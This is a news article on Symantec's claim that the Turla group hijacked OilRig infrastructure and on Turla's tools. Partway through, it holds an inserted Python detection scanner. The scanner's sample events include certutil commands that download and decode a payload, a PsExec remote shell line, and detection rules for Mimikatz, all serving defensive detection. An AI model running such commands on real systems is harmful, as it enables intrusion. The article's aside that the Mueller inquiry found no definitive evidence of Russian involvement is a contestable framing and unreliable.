Security Market Segment LS
Friday, 21 June 2019 09:38

A tale of two threat actors: Symantec claims one used the other's infrastructure in attack Featured


A well-known attack group that is known as Turla, Snake or Waterbug appears to have hijacked and used the infrastructure of another similar group, known as OilRig, APT34 or Crambus, the American security firm Symantec claims.

Turla then used this infrastructure in an attack on a government in the Middle East which OilRig had already compromised, the company claimed in a detailed blog post.

[Given the numerous names bestowed on these attack groups, iTWire will use only Turla and OilRig in this article to avoid confusion.]

But this phenomenon was hinted at in research presented by Kaspersky (formerly Kaspersky Lab) researcher Kurt Baumgartner at his employer's annual security analyst summit in Cancun last year. A Russian-speaking online threat actor, Sofacy, sometimes overlapped with other threat actors like Turla and the Chinese-speaking Danti, when targeting victims, his research claimed.

Baumgartner said Sofacy backdoors were also found on a server which had been previously compromised by the English-speaking threat actor behind the Lamberts, a term used by Kaspersky to indicate CIA-inspired attacks.

Of interest, given the recent brouhaha over stolen NSA exploits, was Symantec's claim that in the course of its attacks, Turla used a custom hacking tool that combined four tools leaked by the Shadow Brokers — EternalBlue, EternalRomance, DoublePulsar and SMBTouch — into a single executable.

Actors from Turla have been observed to be Russian speakers, while OilRig has been linked to Iran by the security firm FireEye, which, admittedly, is quick to make attributions that other companies are reluctant to make.

The Symantec post comes at a time of rising US pressure on Iran, following the downing of an American spy drone over Iranian territory, as per claims from Teheran. The Americans claim the incident took place over international waters.

Russia has been under US pressure for a long time, ever since claims were made that it played a role in the US presidential election of 2016. An investigation of more than two years by former FBI chief Robert Mueller failed to come up with any definitive evidence to support this claim.

Symantec's DeepSight Adversary Intelligence Team said recent activity by Turla could be divided into three campaigns, based on the toolsets used. One used a new backdoor called Neptun that acts as a passive listening tool and infects Microsoft Exchange servers. It was an attack during this campaign that used infrastructure belonging to OilRig.

A second campaign used the publicly available backdoor Meterpreter, along with two custom loaders, a custom backdoor called photobased.dll and a custom RPC (Remote Procedure Call) backdoor. A third campaign used a different RPC backdoor built from code derived from PowerShellRunner, a tool that executes PowerShell scripts without using the official PowerShell binary.

Victims of the three Turla campaigns were listed as:

  • The foreign affairs ministry of a Latin American country;
  • The foreign affairs ministry of a Middle Eastern country;
  • The foreign affairs ministry of a European country;
  • The interior ministry of a South Asian country;
  • Two unidentified government organisations in a Middle Eastern country;
  • One unidentified government organisation in a Southeast Asian country;
  • A government office of a South Asian country based in another country;
  • An information and communications technology organisation in a Middle Eastern country;
  • Two information and communications technology organisations in two European countries;
  • An information and communications technology organisation in a South Asian country;
  • A multinational organisation in a Middle Eastern country; and
  • An educational institution in a South Asian country.

Regarding the hijacking of OilRig infrastructure by Turla, Symantec said it was possible that the two groups were, instead, collaborating in attacking the same victim, a target in the Middle East. But it said it had not found further evidence in support of this theory.

"In all likelihood, Turla’s use of OilRig infrastructure appears to have been a hostile takeover," the Symantec team speculated. "Curiously though, Turla also compromised other computers on the victim’s network using its own infrastructure."

Turla's recent campaigns have been marked by the deployment of new tools, Symantec said, listing the following:

  • A new custom dropper typically used to install Neptun as a service.
  • A custom hacking tool that combines four leaked Equation Group tools (EternalBlue, EternalRomance, DoublePulsar, SMBTouch) into a single executable.
  • A USB data collecting tool that checks for a connected USB drive and steals certain file types, encrypting them into a RAR file. It then uses WebDAV to upload to a Box cloud drive.
  • Visual Basic scripts that perform system reconnaissance after initial infection and then send information to Turla command and control (C&C) servers.
  • PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Turla C&Cs.
  • Publicly available tools such as IntelliAdmin to execute RPC commands, SScan and NBTScan for network reconnaissance, PsExec for execution and lateral movement, Mimikatz (Hacktool.Mimikatz) for credential theft, and Certutil.exe to download and decode remote files. These tools were identified as having been downloaded via Turla tools or infrastructure.
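Several of the tools in the list above are legitimate or freely available binaries (Certutil.exe, PsExec, NBTScan, SScan), so a defender's best handle on them is process-creation telemetry rather than file hashes. The following is an added example, written for this article and not code from Symantec or from the report it describes: a small scanner that runs a handful of heuristic rules over process-creation events. The `key=value` log format and the sample events are constructed for the example; the `-urlcache` and `-decode` switches are certutil's own download and base64-decode options, and the other rules match on well-known tool binary names, which a renamed copy would evade.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events for this example (not real telemetry).
# The "key=value ... cmdline=\"...\"" layout is an assumption, not a vendor format.
SAMPLE_EVENTS = [
    'ts=2019-06-21T09:38:01Z host=ws01 image=C:\\Windows\\System32\\certutil.exe '
    'cmdline="certutil -urlcache -split -f http://203.0.113.10/payload.txt C:\\Users\\Public\\payload.txt"',
    'ts=2019-06-21T09:38:05Z host=ws01 image=C:\\Windows\\System32\\certutil.exe '
    'cmdline="certutil -decode C:\\Users\\Public\\payload.txt C:\\Users\\Public\\payload.exe"',
    'ts=2019-06-21T09:40:12Z host=ws01 image=C:\\Tools\\PsExec.exe '
    'cmdline="PsExec.exe \\\\srv02 -s cmd.exe"',
    'ts=2019-06-21T09:41:30Z host=ws01 image=C:\\Tools\\nbtscan.exe '
    'cmdline="nbtscan 10.0.0.0/24"',
    # Benign certutil use: verifying a certificate should not fire any rule.
    'ts=2019-06-21T09:42:00Z host=ws01 image=C:\\Windows\\System32\\certutil.exe '
    'cmdline="certutil -verify C:\\certs\\server.cer"',
    'ts=2019-06-21T09:45:00Z host=ws01 image=C:\\Windows\\System32\\notepad.exe '
    'cmdline="notepad.exe notes.txt"',
]

_EVENT_RE = re.compile(r'image=(?P<image>\S+)\s+cmdline="(?P<cmdline>[^"]*)"')
_HOST_RE = re.compile(r'host=(\S+)')


@dataclass
class Finding:
    rule: str
    host: str
    image: str
    cmdline: str


def _basename(path: str) -> str:
    """Lower-cased file name of an image path, tolerating both slash styles."""
    return re.split(r'[\\/]', path.lower())[-1]


def _switches(cmdline: str) -> set:
    """Command-line switches with their leading '-' or '/' removed, lower-cased."""
    return {t.lstrip('-/') for t in cmdline.lower().split() if t[:1] in '-/'}


# Each rule: (name, predicate over (basename, switches, lower-cased cmdline)).
# These are heuristics keyed to the tools named in the article; they are not
# signatures for any specific Turla binary.
RULES = [
    ("certutil-download", lambda b, s, c: b == "certutil.exe" and "urlcache" in s),
    ("certutil-decode", lambda b, s, c: b == "certutil.exe" and "decode" in s),
    ("psexec", lambda b, s, c: b in {"psexec.exe", "psexec64.exe", "psexesvc.exe"}),
    ("recon-scanner", lambda b, s, c: b in {"nbtscan.exe", "sscan.exe"}),
    # Binary name or the well-known credential module name; a renamed build evades this.
    ("mimikatz", lambda b, s, c: "mimikatz" in b or "sekurlsa" in c),
]


def parse_event(line: str):
    """Return (host, image, cmdline) or None if the line is not a process event."""
    m = _EVENT_RE.search(line)
    if not m:
        return None
    h = _HOST_RE.search(line)
    return (h.group(1) if h else "unknown", m.group("image"), m.group("cmdline"))


def scan_events(lines):
    """Run every rule over every parseable event; one Finding per matching rule."""
    findings = []
    for line in lines:
        parsed = parse_event(line)
        if parsed is None:
            continue
        host, image, cmdline = parsed
        base, sw, low = _basename(image), _switches(cmdline), cmdline.lower()
        for name, pred in RULES:
            if pred(base, sw, low):
                findings.append(Finding(name, host, image, cmdline))
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.cmdline}")
```

Run against the constructed events, the scanner flags the two certutil invocations, the PsExec launch and the NBTScan sweep, and stays quiet on the certificate verification and on notepad. The certutil rules are the most durable because they key on behaviour (fetching and decoding content) rather than a file name; the remaining rules are only a first pass and should be paired with hash- or signer-based detection for the tools they name.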

Symantec said there could be a number of reasons for the attackers behind Turla choosing to use infrastructure from OilRig.

One was as a false flag operation, to deceive anyone observing the campaign as to the identity of the actual attacker. A second possibility was that Turla used OilRig's infrastructure as the latter had already gained entry to the target.

"This is the first time Symantec has observed one targeted attack group seemingly hijack and use the infrastructure of another group. However, it is still difficult to ascertain the motive behind the attack. Whether Turla simply seized the opportunity to create confusion about the attack or whether there was more strategic thinking involved remains unknown," the researchers wrote.

"Turla's ever-changing toolset demonstrates a high degree of adaptability by a group determined to avoid detection by staying one step ahead of its targets. Frequent retooling and a penchant for flirting with false flag tactics have made this group one of the most challenging adversaries on the targeted attack landscape."


Sam Varghese


Sam Varghese has been writing for iTWire since 2006, a year after the site came into existence. For nearly a decade thereafter, he wrote mostly about free and open source software, based on his own use of this genre of software. Since May 2016, he has been writing across many areas of technology. He has been a journalist for nearly 40 years in India (Indian Express and Deccan Herald), the UAE (Khaleej Times) and Australia (Daily Commercial News (now defunct) and The Age). His personal blog is titled Irregular Expression.
